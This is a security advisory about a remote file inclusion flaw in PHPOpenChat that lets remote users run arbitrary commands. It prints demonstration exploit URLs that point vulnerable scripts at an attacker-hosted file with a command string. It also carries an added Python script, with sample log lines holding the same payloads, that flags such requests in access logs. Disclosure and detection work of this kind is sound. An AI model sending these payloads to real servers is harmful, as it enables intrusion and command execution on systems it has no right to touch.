SecurityTracker.com
Category:   Application (Instant Messaging/IRC/Chat)  >   PHPOpenChat
Vendors:   phpopenchat.org
PHPOpenChat Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1013434
SecurityTracker URL:  http://securitytracker.com/id/1013434
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 16 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.0.1 and prior versions
Description:   Mafia_Boy from Albania Security Clan reported an include file vulnerability in PHPOpenChat. A remote user can execute arbitrary commands on the target system.

A flaw resides in '/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php', where the 'extension.inc' file is included relative to the 'phpbb_root_path' parameter value. A remote user can supply a specially crafted URL to cause the target server to include and execute arbitrary PHP code from a remote system. The PHP code, including operating system commands, will execute with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps

Similar flaws exist in '/phpopenchat/contrib/phpbb/poc.php', '/phpopenchat/contrib/phpnuke/ENGLISH_poc.php', '/phpopenchat/contrib/phpnuke/poc.php', and '/phpopenchat/contrib/yabbse/poc.php'.

Some demonstration exploit URLs are provided:

http://[target]/phpopenchat/contrib/phpbb/poc.php?phpbb_root_path=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps
http://[target]/phpopenchat/contrib/phpbb/poc.php?poc_root_path=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps
http://[target]/phpopenchat/contrib/phpnuke/ENGLISH_poc.php?poc_root_path=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps
http://[target]/phpopenchat/contrib/phpnuke/poc.php?poc_root_path=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps
http://[target]/phpopenchat/contrib/yabbse/poc.php?poc_root_path=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps
http://[target]/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps

If the 'register_globals' and 'allow_url_fopen' options are set to 'on' in the 'php.ini' configuration file, then a remote user can exploit these vulnerabilities.
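
A log check for the requests described above, added here as an example and not part of the original advisory or of PHPOpenChat. It flags access-log entries in which one of the listed scripts receives 'phpbb_root_path', 'poc_root_path' or 'sourcedir' in the query string; the log format (combined log format), the sample lines and the verdict labels are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script paths and variable names as listed in the advisory.
SCRIPTS = (
    "/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php",
    "/contrib/phpbb/poc.php",
    "/contrib/phpnuke/ENGLISH_poc.php",
    "/contrib/phpnuke/poc.php",
    "/contrib/yabbse/poc.php",
)
PARAMS = {"phpbb_root_path", "poc_root_path", "sourcedir"}
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)  # http://, ftp://, php://, ...
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines; all addresses are documentation ranges
    '203.0.113.9 - - [16/Mar/2005:10:01:02 +0000] "GET /phpopenchat/contrib/phpbb/poc.php?phpbb_root_path=http://198.51.100.7/asc?&cmd=id HTTP/1.0" 200 512',
    '203.0.113.9 - - [16/Mar/2005:10:01:09 +0000] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http%3A%2F%2F198.51.100.7%2Fasc%3F HTTP/1.0" 200 498',
    '203.0.113.9 - - [16/Mar/2005:10:02:40 +0000] "GET /phpopenchat/contrib/phpnuke/ENGLISH_poc.php?poc_root_path=../../ HTTP/1.0" 200 120',
    '192.0.2.44 - - [16/Mar/2005:10:03:11 +0000] "GET /phpopenchat/contrib/phpbb/poc.php HTTP/1.1" 200 2048',
]

def classify(line):
    """Return (script, param, verdict) findings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    path = unquote(url.path)
    script = next((s for s in SCRIPTS if path.endswith(s)), None)
    if script is None:
        return []
    findings = []
    # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in PARAMS:
            # These are internal path variables; any client-supplied value is suspect.
            verdict = "remote-include" if SCHEME.match(value) else "path-override"
            findings.append((script, name, verdict))
    return findings

def scan(lines):
    """Return (line_number, script, param, verdict) for every finding."""
    return [(n, *f) for n, line in enumerate(lines, 1) for f in classify(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only the query string is inspected, because request bodies are not recorded in this log format; with 'register_globals' on, the same variables can also arrive by POST or cookie.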

The vendor has been notified.

The original advisory is available at:

http://www.albanianhaxorz.org/advisory/phpopenchaten.txt

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  phpopenchat.org/
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiples vulnerability in PHPOpenChat (File Inclusion Vulnerability)


http://www.albanianhaxorz.org/advisory/phpopenchaten.txt

www.albanianhaxorz.org | irc.gigachat.net -j #ASC
ALBANIA SECURITY CLAN, ALBANIAN RULEZZZ.
 
 



Copyright 2021, SecurityGlobal.net LLC